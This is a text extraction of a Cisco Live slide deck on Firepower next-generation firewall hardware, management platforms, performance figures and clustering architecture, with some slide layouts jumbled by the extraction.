0% found this document useful (0 votes)

393 views592 pages

Tecsec 2600

Uploaded by

asdf01220

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

393 views592 pages

Tecsec 2600

Uploaded by

asdf01220

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 592

Next Generation Firewall

Platforms and Integrations

Bart Van Hoecke, Gyorgy Acs, Sven Kutzer,

Szilard Csordas, Dragan Novakovic

TECSEC-2600
Cisco Webex Teams

Questions?
Use Cisco Webex Teams to chat
with the speaker after the session

How
1 Find this session in the Cisco Events Mobile App
2 Click “Join the Discussion”
3 Install Webex Teams or go directly to the team space
4 Enter messages/questions in the team space

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
Download Scripts
and Presentation
http://cs.co/TECSEC-2600
Please Install Kahoot
Agenda

• Introduction
• HW/SW Overview
• Day in a life of a packet
• FDM & CDO

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 6
Agenda

• Migration
• Backup & Restore
• REST API Overview
• API Use Cases
• Deployment and Interface Modes
• Application Visibility and Control (AVC)
• NextGen Intrusion Prevention System

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 7
Agenda

• Advanced Malware Protection (AMP)

• Identity & TrustSec
• Security Intelligence
• Usability Improvements
• Transport Layer Security (TLS) Decryption

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 8
Agenda

• Remote Access VPN (RA VPN)

• Threat Hunting Part I
• Threat Hunting Part II
• Closing

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 9
Housekeeping

• Please note the handout-material has much more slides than presented
• Various slides are marked as Reference and will not be covered in detail
• Breaks for coffee and lunch
• 10.30am – 10.45am
• 12.45pm – 2.30pm
• 4.30pm – 4.45pm

• Technical Seminar ends 6.45pm

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 10
Housekeeping

• This is an intermediate level technical seminar

• At the end of this session, participants should have:
• Understanding of the in-depth hardware and software capabilities
• Knowledge of Cisco´s NextGen Security
• NextGen Security integrations

• We want this class to be informal, with open discussion

• Be collaborative, curious and ask questions

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 11
Housekeeping

• Visit the World of Solutions

• Meet the Expert
• We value your feedback- don't forget to complete your online session evaluations
after each session
• Please switch off your mobile phones

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 12
Firepower Diagonal Learning Map Thursday BRKSEC-2034 -14h45
Cloud Management of Firepower and ASA with
Cisco Defense Orchestrator

BRKSEC 3629 – 14h45

Monday – 8h30 Designing IPSec VPNs with Firepower Threat Defense integration for Scale and High Availability
TECSEC-2600 Next Generation
Firewall Platforms and Integrations Friday
TECSEC-3004 Troubleshooting BRKSEC-2056 – 9h45
Firepower Threat Defense like a Threat Centric Network Security
TAC Engineer
BRKSEC-3035 – 8h30
Firepower Platforms Deep Dive

BRKSEC-3093 - 14h45
BRKSEC-3328 – 11h00 ARM yourself using
Making Firepower Management NGFWv in AZURE
Center (FMC) Do More
Thursday BRKSEC-3300 – 9h00
Advanced IPS Deployment
BRKSEC 2348 – 17h00 with Firepower NGFW
Deploying AC with FP – posture & MFA

BRKSEC-2140 – 9h00
2 birds with 1 stone: DUO integration
BRKSEC 2020 – 11h00 Wednesday with Cisco ISE and Firewall solutions
Deploying FP Tips and Tricks BRKSEC-3455 – 11h15
Dissecting Firepower NGFW:
Architecture and Troubleshooting
Tuesday
BRKSEC 2494 – 8h30 BRKSEC-3032 – 11H30
Maximizing Threat Efficacy & Perf Firepower NGFW Clustering
BRKSEC-2663 -16h45 Deep Dive
BRKSEC 3063 - 14h30 DDoS Mitigation: Introducing Radware Deployment
Decrypting the Internet with Firepower!

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 13
Hardware |
Software Overview
Security Software Convergence

ASA FirePOWER

• L2-L4 Stateful Firewall, ALG • Threat-centric NGIPS

• Scalable CGNAT, ACL, routing • AVC, URL Filtering for NGFW
• High Availability • Advanced Malware Protection (AMP)

Firepower Threat Defense (FTD)

• New converged NGFW/NGIPS image

• Data Path with TCP Normalizer, NAT, ACL, dynamic routing, failover functions
• Advanced Inspection Modules with NGIPS, AVC, URL, AMP, Security Intelligence,…

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 15
Firepower Threat Defense

Enterprise-class stateful firewall

Cisco TALOS

Advanced
WWW Granular Cisco® Application
Clustering & Intrusion Malware
URL Filtering
Visibility and Control (AVC)
Prevention Protection
High Availability
Firepower
Analytics &
Automation
Industry-leading NGIPS (NGIPS)
Application
Network Firewall Visibility & Built-in Network Identity-Policy
Routing | Control Profiling Control & VPN
Switching Reputation- and category-based
URL filtering
Firepower Threat Defense
Advanced Malware Protection
(AMP)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 16
Hardware Platforms

NEW
FPR 9300 Series
SM-24 SM-40
SM-36 SM-48
FPR 4115/25/45
SM-44 SM-56
Performance

NEW
FPR 2110/20/30/40
FPR 4110/20/40/50
NEW
FPR 1120/40/50
ASA 5525/45/55 FTDv
FPR 1010
ASA 5506/08/16 NGIPSv
ISA 3000 ASAv

IOT SOHO Branch Mid-size Large Data Service

SMB Office Enterprise Enterprise Center Provider

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 17
Firepower Threat Defense Virtual Platforms
FTDv

Private Cloud Public Cloud

4 Core • 1.2 Gbps AVC
• 1.2 Gbps AVC • 1.1 Gbps AVC+IPS
• 1.1 Gbps AVC+IPS
AWS Instance types
8 Core • c3.xlarge
• 2.4 Gbps AVC VMware
• c4.xlarge
• 2.2 Gbps AVC+IPS and KVM
• c5.xlarge
12 Core
Azure Instance types
• 3.6 Gbps AVC
• Standard D3
• 3.3 Gbps AVC+IPS
• D3v2

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 18
Firepower Management Options
Security Integrations Common APIs

Cisco Firepower Cisco Firepower Cisco

Management Center Device Manager Defense Orchestrator
(FMC) (FDM) (CDO)

Helps administrators enforce

On premise
consistent accessCentralized
policies, rapidly ForOn-box
easy on-boxManager
management of Cloud Based cloud-based
For centralized Centralized
policy management of multiple
Manager
troubleshoot security events, and single FTD or pair of FTDs Manager
view summarized reports across the NetOps runningFocused
in HA
deployments
SecOps Focused
deployment NetOps
*For FTD Focused
release 6.4 or higher

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 19
Which manager is right for your network?

FMC CDO FDM

Location of manager On premise Cloud On device

Type of manager Multi-device Multi-device, Single-device

Multi-platform
Primary management focus SecOps NetOps Simplified
NGFW
Type of managed device NGFW, NGIPS NGFW, ASA, NGFW
MX, AWS VPC
Shared Policy elements across multiple Yes
products
Eventing FMC, Syslog, Syslog, Cloud FDM, Syslog,
Estreamer, Logging, CTR* CTR*
CTR*
* Cisco Threat Response
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 20
For Your
Software Support by Platform Reference

Device Platform FMC FDM ASDM/CSM

FTD FTD ASA
Firepower 1010, 1120, 1140 6.4.0+ 6.4.0+ ASA 9.13(1)+
Firepower 1150 6.5.0+ 6.5.0+ ASA 9.13(1)+
Firepower 2110, 2120, 2130, 2140 6.2.1+ 6.2.1+ ASA 9.8(2)+
Firepower 4110, 4120, 4140 6.0.1+ 6.5.0+ ASA 9.6(1)+
Firepower 4150 6.1.0+ 6.5.0+ ASA 9.6(2)+
Firepower 4115, 4125, 4145 6.4.0+ 6.5.0+ ASA 9.12(1)+
Firepower 9300: SM-24, SM-36, SM-44 6.0.1+ 6.5.0+ ASA 9.4(1.152)+
Firepower 9300: SM-40, SM-48 6.4.0+ 6.5.0+ ASA 9.12(1)+
SM-56 6.4.0+ 6.5.0+ ASA 9.12(2)+
ASA 5506-X, 5506H-X, 5506W-X 6.0.1 to 6.2.3 6.1.0 to 6.2.3 ASA 9.3+
ASA 5508-X, 5516-X 6.0.1+ 6.1.0+ ASA 9.4(1)+
ASA 5525-X, 5545-X, 5555-X 6.0.1+ 6.1.0+ ASA 8.6+
Virtual: VMware 6.0.1+ 6.2.2+ ASA 9.2(1)+
Virtual: AWS 6.0.1+ — ASA 9.4(1.200)+
Virtual: KVM 6.1.0+ 6.2.3+ ASA 9.3(2.200)+
Virtual: Azure 6.2.0+ 6.5.0+ ASA 9.5(2.200)+
ISA 3000 6.2.3+ 6.2.3+ ASA 9.4(1.225)+

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 21
For Your
EOL Updates and Last Supported Code Reference

Last Supported Releases

Name Replacement ASA ASA w FPS FTD

ASA 5505 FPR1010 9.2 N/A N/A
ASA 5506 FPR1010 TBD 6.2.3 6.2.3
ASA 5512 FPR1120 9.9.2 9.9.2/6.2.3 6.2.3
ASA 5515 FPR1140 9.12 9.12/6.4 6.4
ASA 5585-X FPR4100/9300 9.12 9.12/6.4 N/A

FPR7K FPR1140/50/FPR2K N/A N/A 6.4

FPR4115-45/FPR9300
FPR8K N/A N/A 6.4
(SM40/48/56)

FMC 1500, 3500 FMC 1600, 2600, 4600 N/A 6.4 6.4

FMC 1000, FMC 2500,

FMC 1600, 2600, 4600
FMC 4500 N/A N/A N/A

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 22
Firepower
Management
Center
Firepower Management Center (FMC)

• Defense Center -> FireSIGHT Management -> Firepower Management Center

• Physical and Virtual Appliances

• Physical FMC Models:

• FMC 1600
• FMC 2600
• FMC 4600

• Models are based on the UCS C220 M5 series

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 24
For Your
FMC Scaling Reference

FMC 1600 FMC 2600 FMC 4600 FMCv FMCv300

Managed
50 300 750 25 300
Devices
Max IPS
30 million 60 million 300 million 10 million 60 million
Events
Max Network
Map 50k/50k 150k/150k 600k/600k 50k/50k 150k/150k
(hosts/users)
Max Flow
5k fps 12k fps 20k fps Varies TBD
Rate (fps)

Log Storage 900 GB 1.8 TB 3.2 TB 250 GB TBD

Average Event size: 700 bytes

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 25
FMC Performance Considerations UI Response

Event Rate

Event Storage
Events
Connection, IPS,
Number of sensors
File, Malware
FTD Model Type
Network load
Logging setup
NGFW
FTD FMC
Deployment Time
4500
NGFW
Bandwidth
FTD
Management
Data Download size
Channel
Configuration,
Number of sensors
Updates, Image
Model Type
ACL complexity
HA deployment
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 26
FMC Communication Elements

Data Transfer
Item Typical Package Size Default Timeout
Direction
Device
1-10MB depending on features
Configuration and FTD<-FMC 5 minutes
Up to 1MB added for SRU
SRU
20MB for low-end platforms
URL Database FTD<-FMC 60 minutes
40-450MB for high-end platforms
Asynchronous VDB 10 minutes under 10MB
FTD<-FMC 30-70MB every ~6 weeks
Updates 60 minutes under 4GB

Software Patch and

FTD<-FMC 300MB-1GB 60-100 minutes
Upgrade Images
Average 700 bytes per event
Events FTD>FMC N/A
URL sizes are highly variable

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 27
FMC Link Bandwidth Requirements

• Image file transfer is the bottleneck in terms of minimum bandwidth

• 700Kbps-2.5Mbps depending on platform and bundle size
• Consider manual image upload with SCP
• Configuration bundle size varies based on features
Policy Type Bundle Size Minimum Bandwidth
1 IPS Policy (Balanced Security and Connectivity) 1.8MB 52Kbps
2 IPS Policies (No Rules + Balanced Security and Connectivity) 2.3MB 66Kbps
4 IPS Policies and Minimal AC Policy (All 4 default IPS + 3 AC Rules) 5.3MB 151Kbps
4 IPS Policies and Medium AC Policy (All 4 default IPS + 1000 AC Rules) 7.8MB 221Kbps
4 IPS Policies and Extra Large AC Policy (All 4 default IPS + 5000 AC rules) 8.2MB 234Kbps
4 IPS Policies and Enormous AC Policy (All 4 default IPS + 10000 AC rules) 9MB 255Kbps

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 28
For Your
FMC Configuration Bundle Size Reference

• Number of access policy rules applied on the managed device greatly influences the
size of configuration data to be downloaded
Number of rules = (source subnets or hosts)*(destination subnets or hosts)*(source
ports)*(destination ports)*(custom URLs)*(vlan tags)*(URL categories)*(valid source
and destination zone pairs)
• Recommendations:
• Use Security Intelligence Blacklists to block access to destination subnets instead of access
rule
• Use Application Filters instead of ports wherever possible in access rule
• Zones should contain interfaces

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 29
For Your
Event Management Best Practices Reference

• Optimize what data traffic is logged

• Disable logging for trusted and irrelevant traffic
• Log only at beginning or end of connection
• Tune Variable Set
• Create Correlation rules to trigger events for specific concerns

• Setting an appropriate time window for event view

• Longer time windows will increase database query times
• Keep events under 10000
• Typically an hour

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 37
Firepower 9300
Firepower 9300 Overview
Supervisor Network Modules
• Application deployment and orchestration • 10GE, 40GE, and 100GE
• Network attachment and traffic distribution • Hardware bypass for inline NGIPS
• Clustering base layer for ASA/FTD

3RU

Security Modules
• Embedded Smart NIC and crypto hardware
• Cisco (ASA, FTD) and third-party (Radware DDoS) applications
• Standalone or clustered within and across chassis

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 39
Supervisor Module

RJ-45 1GE Management Built-in 10GE Optional Network

Console (SFP) Data (SFP+) Modules (NM)
1 2

• Overall chassis management and network interaction

• Network interface allocation and module connectivity (960Gbps internal fabric)
• Application image storage, deployment, provisioning, and service chaining
• Clustering infrastructure for supported applications
• Smart Licensing and NTP for entire chassis

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 40
Supervisor Simplified Hardware Diagram

System Bus
Security Security Security
RAM
Module 1 Module 2 Module 3

2x40Gbps 2x40Gbps 2x40Gbps Ethernet

Internal Switch Fabric

x86 CPU
(up to 24x40GE)

2x40Gbps 5x40Gbps 5x40Gbps

On-board NM NM
8x10GE Slot 1 Slot 2
interfaces

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 41
Standard Network Modules

• All interfaces are called “Ethernet” (i.e. Ethernet 1/1)

• All standard network modules require fiber or copper transceivers

Number of
Speed Type Supported Plaforms
Ports
1GE 8 SFP Firepower 2100
10GE 8 SFP+ Firepower 2100, 4100 and 9300
QSFP 40G
40GE 4 Firepower 4100 and 9300
QSFP 4x10G
2 (double)
100GE QSFP 100G Firepower 9300
2/4 (single)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 42
Hardware Bypass Fail-to-Wire Network Modules

• Fixed interfaces, no removable SFP support

• Sub-second reaction time to application, software or hardware failure

Number of
Speed Type Supported Platforms
Ports
1GE 6 SX Firepower 2100 and 4100
1GE 8 GE Firepower 2100 and 4100
10GE 6 SR/LR Firepower 2100, 4100 and 9300
40-G BASE-
40GE 2 Firepower 4100 and 9300
SR4

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 43
Firepower 9300 Security Modules

• Same modules must be installed across entire chassis or cluster

• SM-24: 48 x86 CPU cores
• SM-36: 72 x86 CPU cores
• SM-44: 88 x86 CPU cores

• New modules
• SM-40: 80 x86 CPU cores
• SM-48: 96 x86 CPU cores
• SM-56: 112 x86 CPU cores
• Higher performance on cryptographic operations

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 44
Security Module Simplified Diagram

RAM
SM24:256 GB
SM36:256 GB System Bus
SM40: 384 GB x86 CPU 1 x86 CPU 2
SM44: 256 GB SM24: 12 cores SM24: 12 cores
SM48: 384 GB SM36: 18 cores SM36: 18 cores
SM56: 384 GB SM40: 20 cores SM40: 20 cores
SM44: 22 cores SM44: 22 cores Ethernet
SM48: 24 cores SM48: 24 cores
SM56: 28 cores SM56: 28 cores

2x100Gbps

Smart NIC and

Crypto Accelerator

2x40Gbps
Backplane Supervisor Connection

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 45
For Your
FTD CPU Core Allocation Reference

Total x86 Advanced Inspection

Platform Application Cores System Cores Data Path
Cores Engines

Firepower 4110 24 22 2 8 12
Firepower 4115 48 46 2 16 28
Firepower 4120 48 46 2 20 24
Firepower 4125 64 62 2 24 36
Firepower 4140 72 70 2 32 36
Firepower 4145 88 86 2 32 52
Firepower 4150 88 86 2 36 48
Firepower 9300 SM-24 48 46 2 20 24
Firepower 9300 SM-36 72 70 2 32 36
Firepower 9300 SM-40 80 78 2 32 44
Firepower 9300 SM-44 88 86 2 36 48
Firepower 9300 SM-48 96 94 2 40 52
Firepower 9300 SM-56 112 110 2 44 64

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 46
For Your
Monitoring System Utilization Reference

• Data Path ftd# show cpu detailed

Break down of per-core data path versus control point cpu usage:

Data Path
Core 5 sec 1 min 5 min Control Plane
Core 0 2.0 (2.0 + 0.0) 1.1 (1.1 + 0.0) 0.9 (0.9 + 0.0)
(most transit Core 1 3.2 (3.2 + 0.0) 1.8 (1.8 + 0.0) 1.5 (1.5 + 0.0)
(network
traffic) […] control and
Core 35 0.0 (0.0 + 0.0) 0.0 (0.0 + 0.0) 0.0 (0.0 + 0.0)
application
• Advanced inspection)
ftd# show asp inspect-dp snort
Inspection SNORT Inspect Instance Status Info
Modules
Id Pid Cpu-Usage Conns Segs/Pkts Status
tot (usr | sys)
Inspection -- ----- ---------------- ---------- ---------- ----------
0 47430 1% ( 1%| 0%) 621 0 READY
Load 1 47434 0% ( 0%| 0%) 610 0 READY Processing
Load
[…] State
45 47474 2% ( 2%| 0%) 572 0 READY
Distribution

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 47
For Your
Performance Highlights Cisco Reference

Firepower 9300
3x 3x
Features SM-24 SM-36 SM-40 SM-44 SM-48 SM-56
SM-44 SM-56

Firewall 75 80 80 80 234 80 80 235

Throughput Gbps Gbps Gbps Gbps Gbps Gbps Gbps Gbps
(ASA)

Throughput: 25 34 54 50 148 64 70 168

FW + AVC Gbps Gbps Gbps Gbps Gbps Gbps Gbps Gbps
(FTD)*

Throughput: 21 29 48 43 132 55 64 153

FW + AVC Gbps Gbps Gbps Gbps Gbps Gbps Gbps Gbps
+ NGIPS
(FTD)*

* HTTP sessions with an average packet size of 1024 bytes.

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 48
Firepower 9300 Software

• Supervisor and security modules use multiple independent images

• All images are digitally signed and validated through Secure Boot

• Security application images are in Cisco Secure Package (CSP) format

Security Module 1 Security Module 2 Security Module 3

Decorator application from third-party
(KVM*) DDoS
ASA/FTD ASA/FTD
Primary application from Cisco (Native) ASA/FTD
FXOS FXOS FXOS
FXOS upgrades are applied to Supervisor
and resident provisioning agent on modules
Firepower Extensible Operating System (FXOS)

Supervisor

*3rd party packages will run on KVM

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 49
Multi-Instance

• Supported on Firepower 4100 and 9300 only

• Instantiate multiple logical devices on a single module or appliance
• A mix of FTD and ASA instances
• Leverage Docker infrastructure and container packaging

• Complete traffic processing and management isolation

• Physical and logical interface and VLAN separation at Supervisor

FTD Instance A FTD Instance B FTD Instance C FTD Instance D ASA Instance A
4 CPU 4 CPU 12 CPU 4 CPU 12 CPU

Firepower 4100 or Firepower 9300 module

Ethernet1/1-3 Ethernet1/4-5 Port-Channel1.100-101 Port-Channel2 Port-Channel1.101-102

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 50
FP9300 Application Flexibility

Firepower 9300 Chassis

Security Module 1: SM-24

ASA Native

Security Module 2: SM-36

FTD Native

Security Module 3: FTD Instances SM-56

Instance 1 Instance 2 Instance 3

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 51
BRKSEC-3032
Firewall Clustering Clustered
Firewall

• Centralized configuration mirrored to all

members
.
• Connection state preserved after a single .
.
member failure
• Stateless load-balancing via Spanned Inside Outside
EtherChannel
• Out-of-band Cluster Control Link to
compensate for external asymmetry
• Elastic scaling of throughput and maximum
concurrent connections

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 52
FTD Inter-chassis vs Intra-chassis clustering
FTD Inter-Chassis Cluster (FTD 6.2+)
• Cluster of up to 6 modules (in 2 chassis)
• Off-chassis flow backup for complete redundancy

Switch 1 Switch 2
Nexus vPC

FP9300 Chassis 1 FP9300 Chassis 2

Supervisor Supervisor
FTD FTD FTD FTD
Cluster
FTD Cluster FTD

FTD Intra-Chassis Cluster

• Modules can be clustered within chassis
• Bootstrap configuration is applied by Supervisor
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 53
Security Services Architecture
Logical
Device FTD Cluster
Security Module 1 Security Module 2 Security Module 3 Primary
Logical
Device Unit FTD FTD FTD Application

DDoS DDoS Decorator

Link DDoS
Decorator Application

Logical
Supervisor Data Outside Data Inside Packet Flow
PortChannel2 PortChannel1
Ethernet1/7
(Management)
On-board
8x10GE 4x40GE NM 4x40GE NM Application
interfaces Slot 1 Slot 2 Image Storage

Ethernet 1/1-8 Ethernet 2/1-4 Ethernet 3/1-4

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 54
Firepower 4100
Firepower 4100 Overview

Solid State Drives

Built-in Supervisor and Security Module • Independent operation (no RAID)
• Same hardware and software architecture as 9300 • Slot 1 today provides limited AMP storage
• Fixed configurations (4110 - 4150) • Slot 2 provides optional AMP storage

1RU

Onboard Connectivity Network Modules

• 8 x 10G SFP+
• 10GE/40GE interchangeable with 9300
• Partially overlapping fail-to-wire network modules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 56
Firepower 4100 Architecture
RAM
4110: 64Gb
x86 CPU 1 x86 CPU 1
4115: 192Gb
4110: 12 cores 4110: NA
4120: 128Gb 4115: 12 cores 4115: 12 cores
4125: 192Gb 4120: 12 cores 4120: 12 cores System Bus
4140: 256Gb 4125: 16 cores 4125: 16 cores
4145: 384Gb 4140: 18 cores 4140: 18 cores
4150: 256Gb 4145: 22 cores
4150: 22 cores
4145: 22 cores
4150: 22 cores
RAM
4110: 1x100Gbps Ethernet
4115-4150: 2x100Gbps
Smart NIC and
Crypto Accelerator
4110: 1x40Gbps
4115-4150: 2x40Gbps

Internal Switch Fabric

(up to 18x40GE)
x86 CPU

2x40Gbps 5x40Gbps 5x40Gbps

On-board 8x10GE NM NM
interfaces Slot 1 Slot 2

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 57
Firepower 4100 Software

• FXOS provides interface for device Decorator application from third-party

management and provisioning of (KVM)
the security application on security
engine Primary application
from Cisco (Native)
• All images are digitally signed and
validated through Secure Boot
• Security application images are in DDoS
Cisco Secure Package (CSP) FTD
format FXOS
• DDoS support on Firepower 4100
for ASA/FTD Firepower Extensible Operating System (FXOS)
Supervisor

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 58
For Your
Performance Highlights Cisco Reference

Firepower 4100

Features 4110 4115 4120 4125 4140 4145 4150

Firewall 35 Gbps 80 Gbps 60 Gbps 80 Gbps 70 Gbps 80 Gbps 75 Gbps

Throughput
(ASA)

Throughput: 13 Gbps 27 Gbps 22 Gbps 40 Gbps 32 Gbps 53 Gbps 45 Gbps

FW + AVC
(FTD)*

Throughput: 11 Gbps 26 Gbps 19 Gbps 35 Gbps 27 Gbps 45 Gbps 39 Gbps

FW + AVC
+ NGIPS
(FTD)*

* HTTP sessions with an average packet size of 1024 bytes.

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 59
Firepower 2100
Firepower 2100 Overview

Integrated Security Platform

• Embedded x86 and NPU with Hardware Crypto Acceleration
• Fixed configurations (2110, 2120, 2130, 2140) SFP/SFP+ Data Interfaces
• Dual redundant power supplies on 2130 and 2140 only • 4x1GE on Firepower 2110 and 2120
• 4x10GE on Firepower 2130 and 2140

1RU

Copper Data Interfaces Network Module

• 12x1GE Ethernet • Firepower 2130 and 2140 only
• Standard or Hardware Fail-to-Wire Network Modules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 61
Firepower 2100 Architecture
x86 CPU
2110: 4 cores RAM
2120: 6 cores 2110-2120: 16GB
2130: 8 cores Data32GB
2130: Path: System Bus
2140: 64GB
2140: 16 cores • NAT
• VPN
Network Processor Unit (NPU) Ethernet
2110: 6 cores
Routing
• RAM
2120: 8 cores • Stateful
2110-2120: 8GB Firewall
2130: 12 cores • High16GB
2130-2140: Availability
2140: 16 cores • Prefilter Action:
2110-2120: 2x10Gbps
2x10Gbps
2130-2140: 1x40Gbps
• Block, Fastpath,
Analyze
Internal Switch Fabric

12x1Gbps 2110-2120 :4x1Gbps 8x10Gbps

2130-2140: 4x10Gbps

Management On-board 12x1GE On-Board Interface expansion

interface copper interfaces 4xSFP interfaces module (2130-2140
only)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 62
Firepower 2100 Architecture
x86 CPU Advanced Inspections
RAM
2110: 4 cores Modules:
2110-2120:
2120: 6 cores AVC with OpenAppID
• 16GB System Bus
2130: 8 cores • NGIPS
2130: 32GB
2140: 16 cores 2140: 64GB & File inspection (AMP)
• Malware
Network Processor Unit (NPU) • Security Intelligence
Ethernet
2110: 6 cores • RAM
URL Filter
2110-2120: 8GB
2120: 8 cores • User Identity
2130-2140:
2130: 12 cores
2140: 16 cores 16GB

2x10Gbps 2110-2120: 2x10Gbps

2130-2140: 1x40Gbps

Internal Switch Fabric

12x1Gbps 2110-2120 :4x1Gbps 8x10Gbps

2130-2140: 4x10Gbps

Management On-board 12x1GE On-Board Interface expansion

interface copper interfaces 4xSFP interfaces module (2130-2140
only)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 63
For Your
Performance Highlights Cisco Firepower Reference

Model
Cisco Firepower Model 2100

2110 2120 2130 2140

Firewall Throughput
3 Gbps 6 Gbps 10 Gbps 20 Gbps
(ASA)
Throughput:
FW + AVC 2.0 Gbps 3 Gbps 4.75 Gbps 8.5 Gbps
(FTD)*
Throughput:
FW + AVC + NGIPS 2.0 Gbps 3 Gbps 4.75 Gbps 8.5 Gbps
(FTD)*
*HTTP sessions with an average packet size of 1024 bytes.

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 64
Firepower 1000
Firepower 1100 Overview

Integrated Security Appliance

• Embedded x86 CPU with QuickAssist Crypto Acceleration SFP Data Interfaces
• Fixed non-modular configurations (1120, 1140, 1150) • 4x1GE on 1120 and 1140
• Single Power Supply • 2x1GE, 2x10GE on 1150

1RU

Copper Data Interfaces Field Replaceable SSD

• 8x1GE Ethernet

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 66
Firepower 1010 Overview
Integrated Security Appliance with ASA or FTD
• Embedded x86 CPU with QuickAssist Crypto Acceleration
• Fixed non-modular configuration

Desktop

Copper Data Interfaces

• 8x1GE Ethernet
• Built-in Layer 2 switch
• Power over Ethernet (PoE) on ports 7 and 8

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 67
Firepower 1000 Architecture

x86 CPU
1010: 8 cores RAM System Bus
1120: 24 cores 1010: 8GB
1140: 32 cores 1120-1140: 16GB
1150: 32 cores 1150: 32GB
Ethernet
1010: 2x2.5Gbps
1120-1150: 2x10Gbps

Internal Switch Fabric

Embedded Layer 2 Switch (1010 only)

8x1Gbps 4x1Gbps

Management On-board 8x1GE copper On-Board 4xSFP interfaces

interface interfaces (1120-1150 only)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 68
Firepower 1000/2100 ASA Appliance Mode

• Platform mode
• Configuration of basic operating parameters and hardware interface settings in FXOS
• Configuration of your security policy in the ASA operating system using ASDM or the ASA CLI

• Appliance mode (the default)

• Configuration of all settings in the ASA
• Only advanced troubleshooting commands in FXOS CLI

Dedicated Enterprise Management In-band Management via Inside

(DHCP Client with CLI/HTTPS Access) (DHCP Server with CLI/HTTPS and Outbound Access)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 69
Industrial Security
Appliance (ISA)
3000
ISA 3000

• ISA-3000 supports 3 different software

architectures
• ASA
• ASA w/ FirePOWER Services 6.3+
• FTD 6.2.3+

• Now supports AMP and URL (6.4)

Two models of ISA 3000

Copper interfaces 4C
Fiber interfaces 2C2F

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 71
A Day In a Life Of
a Packet
Packet Processing - Overview
• A packet enters the ingress interface and it is handled by the chassis internal switch.
• The packet enters the FTD Lina engine which does mainly L3/L4 checks.
• If the policy requires the packet is inspected by the Snort engine (mainly L7 inspection).
• The Snort engine returns a verdict (for example, whitelist or blacklist) for the packet.
• The LINA engine drops or forwards the packet based on Snort’s verdict.
• The packet egresses the chassis through the internal chassis switch.

Internal
Switch Advanced Inspection Engine
FXOS

Data Path (Lina Engine)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 73
For Your
FTD CLI Configuration Modes Reference

> expert CLISH mode

admin@FTD5506-1:~$ sudo su Expert mode
Password:
